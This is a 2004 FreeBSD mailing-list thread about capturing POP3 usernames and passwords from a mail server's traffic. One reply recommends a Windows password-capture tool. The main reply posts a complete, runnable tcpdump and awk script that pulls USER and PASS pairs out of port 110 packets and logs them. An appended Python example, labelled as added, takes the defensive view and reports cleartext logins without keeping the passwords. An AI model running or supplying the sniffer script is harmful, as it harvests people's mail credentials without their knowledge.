Subject: Re: tcpdump for sniffing POP3 -- methods ? - msg#00082
List: os.freebsd.isp
> 2) Obtain them by sniffing the POP3 traffic being sent
> to the Imail server.
You can do it directly at the Windows machine. Just use PassDetect at
http://www.effetech.com/aps/
It can capture POP3 passwords in real time.
_______________________________________________
freebsd-isp@xxxxxxxxxxx mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-isp
To unsubscribe, send any mail to "freebsd-isp-unsubscribe@xxxxxxxxxxx"
Previous Message by Date:
Re: tcpdump for sniffing POP3 -- methods ?
On Tue, Apr 13, 2004, Adam Maloney wrote:
>I've done this in the past. I had tcpdump spitting out all the dst port
>110 packets to a file. Then a perl script with Net::TCPDump (or
>whatever it's called) to parse it.
The tcpflow program makes this far easier as it separates each
connection out into its own file. The command line options for
tcpflow are about the same as tcpdump.
Bill
--
INTERNET: bill@xxxxxxxxxxxxx Bill Campbell; Celestial Software LLC
UUCP: camco!bill PO Box 820; 6641 E. Mercer Way
FAX: (206) 232-9186 Mercer Island, WA 98040-0820; (206) 236-1676
URL: http://www.celestial.com/
It's very glamorous to raise millions of dollars, until it's time for the
venture capitalist to suck your eyeballs out.
-- Peter Kennedy, chairman of Kraft & Kennedy.
Next Message by Date:
soundcard
Hi, I'm a real newbie, from Guatemala, and I got my first question: how can I
know if my soundcard is properly configured, since I try to play a song using
xmms and a message appears like this: "Please check that: your soundcard is
configured properly, you have the correct output plugin selected, no other
application is blocking the sound card". Please help me and excuse my not
very good English, thanks to everybody.
Adios.
Next Message by Thread:
Re: tcpdump for sniffing POP3 -- methods ?
On Tue, 13 Apr 2004, John Fox wrote:
> 2) Obtain them by sniffing the POP3 traffic being sent
> to the Imail server.
>
> I think #2 is the only possibility, and I haven't made much
> use of tcpdump, so while I do know how to run it and
> specify a host to listen to, I've no idea how to isolate
> the clear-text stuff (containing the usernames and passwords)
> from all the other traffic.
>
> Any suggestions would be greatly appreciated.
I had to do this some years back, here's the rude, crude and unattractive
script I wrote then:
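# cat sniff.pop.passwords
#! /bin/sh

log=sniffed.passwords.log
mailhost="mail"   # Hostname of whichever host receives your incoming mail

tcpdump -lnx -s 256 dst port 110 and host $mailhost 2>/dev/null | awk '
  # index() into lut gives the value of a hex digit; "0" is not found and yields 0
  BEGIN{ lut="123456789abcdef" }
  # Packet header line: remember the source address.port and reset per-packet state
  />/ { IP=$2; n=0; len=0; c=""; }
  {
    # First hex line: the second group is the IP total-length field
    if(n==1) for(x=1; x<=4; x++) len=len*16+index(lut,substr($2,x,1));
    if(++n>3 && len>20)
    {
      # From the third hex line on, skip what is left of the 40 header bytes
      # and decode each 4-digit group into two payload characters
      for(i=(n==4)*4+1; i<=NF; i++)
        c=sprintf("%s%c%c",c,
          index(lut,substr($i,1,1))*16+index(lut,substr($i,2,1)),
          index(lut,substr($i,3,1))*16+index(lut,substr($i,4,1)))
      # Whole payload collected (total length minus 40 header bytes)
      if(length(c) >= len-40)
      {
        sub("\.[0-9]*$","",IP);   # drop the port from the source address
        v=substr(c,6); gsub("[^a-zA-Z0-9]","",v)
        if(substr(c,1,5)=="USER ") usr[IP]=v;
        if(substr(c,1,5)=="PASS " && usr[IP]) {
          printf("%s %-16.16s %10s - %s\n",
            strftime("%d-%b-%Y %H:%M:%S"), IP, usr[IP], v);
          usr[IP]=""
        }
      }
    }
  }'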
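An added example, not part of any message in this thread: per-connection capture files such as the ones tcpflow writes hold the client's POP3 commands, so a mail admin can list which accounts still send USER/PASS unencrypted on port 110 without keeping the passwords. The flow contents, addresses and function names below are constructed for illustration.

```python
import re

# Authentication-related POP3 client commands: USER/PASS and APOP (RFC 1939),
# STLS (RFC 2595), AUTH (RFC 5034). Command keywords are case-insensitive.
_CMD = re.compile(rb"^(USER|PASS|APOP|AUTH|STLS)(?: +(.*?))?\r?$", re.I | re.M)

# Constructed sample: client-to-server bytes of four POP3 connections, keyed by
# client address, in the form a per-connection capture file would hold them.
SAMPLE_FLOWS = {
    "192.0.2.10": b"USER alice\r\nPASS s3cret\r\nSTAT\r\nQUIT\r\n",
    "192.0.2.11": b"CAPA\r\nAPOP bob c4c9334bac560ecc979e58001b3e22fb\r\nQUIT\r\n",
    "192.0.2.12": b"CAPA\r\nSTLS\r\n\x16\x03\x01\x00\x05hello",
    "192.0.2.13": b"user carol\r\npass two words\r\nQUIT\r\n",
}

def auth_events(stream: bytes) -> list:
    """Return (method, username) per authentication attempt; passwords are never kept."""
    events, pending = [], None
    for m in _CMD.finditer(stream):
        cmd = m.group(1).upper().decode()
        arg = (m.group(2) or b"").decode("latin-1")
        if cmd == "USER":
            pending = arg
        elif cmd == "PASS":
            # The whole rest of the line is the password (it may contain spaces).
            if pending and arg:
                events.append(("cleartext", pending))
            pending = None
        elif cmd == "APOP" and arg:
            events.append(("apop", arg.split(" ")[0]))  # a digest follows the name
        elif cmd == "AUTH" and arg:
            # SASL; PLAIN and LOGIN are only base64-encoded unless inside TLS.
            events.append(("sasl:" + arg.split(" ")[0].upper(), ""))
        elif cmd == "STLS":
            # Keep parsing: a fallback to USER/PASS after a refused STLS is still seen.
            events.append(("stls", ""))
    return events

def cleartext_accounts(flows: dict) -> dict:
    """Map client address -> sorted usernames whose PASS crossed the wire unencrypted."""
    exposed = {}
    for client, stream in flows.items():
        users = sorted({u for kind, u in auth_events(stream) if kind == "cleartext"})
        if users:
            exposed[client] = users
    return exposed

if __name__ == "__main__":
    for client, users in cleartext_accounts(SAMPLE_FLOWS).items():
        print(client, ", ".join(users))
```

Accounts that show up here are the ones whose credentials anyone on the path to the mail server can read, which makes them the first candidates for a move to STLS or POP3 over TLS.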